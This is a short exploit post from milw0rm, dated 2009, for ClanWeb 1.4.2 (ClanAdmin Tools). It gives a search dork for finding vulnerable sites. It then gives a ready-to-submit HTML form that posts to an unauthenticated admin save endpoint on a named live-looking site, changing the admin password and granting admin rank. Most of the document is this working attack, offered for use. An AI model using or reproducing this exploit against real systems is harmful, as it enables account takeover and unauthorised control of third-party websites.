ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit

                                                                =-=-remote change password and add admin xpl-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script:ClanWeb 1.4.2
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.clanadmintools.com/files.htm
--------------------------------------------------
dork:"Powered by ClanAdmin Tools v1.4.2"
--------------------------

change pass and add admin:


<h2>coded by ahmadbady</h2>
<form id="FormName" action="http://mercurycs.co.za/admincp/save.php?type=user&action=update&id=1" method="post" name="FormName">
<table width="100%" border="0" cellspacing="0" cellpadding="3" align="center">
<tr>
<td align="left" valign="top" bgcolor="#f5f5f5" width="20%"><strong>Username:</strong></td>
<td align="left" bgcolor="#f5f5f5"><input type="text" name="username" value="root" size="24"></td>
</tr>
<tr>
<td align="left" valign="top" width="20%"><strong>Password:</strong></td>
<td align="left"><input type="password" name="password" size="24"></td>
</tr>
<tr>
<td align="left" valign="top" bgcolor="#f5f5f5" width="20%"><strong>E-mail Address:</strong></td>
<td align="left" bgcolor="#f5f5f5"><input type="text" name="mail" value="" size="24"></td>
</tr>
<tr>
<td align="left" valign="top" bgcolor="#f5f5f5" width="20%"><strong>Permissions:</strong></td>
<td align="left" bgcolor="#f5f5f5"><select name="u_rank" size="1">
<option value="1">1</option>
<option value="1">Admin</option>
<option value="3">Member</option>
</select></td>
</tr>			
</table><br>
<div align="center"><input type="submit" name="edit_user" value="Edit User"></div>
</form>
</td>									

---

# milw0rm.com [2009-05-18]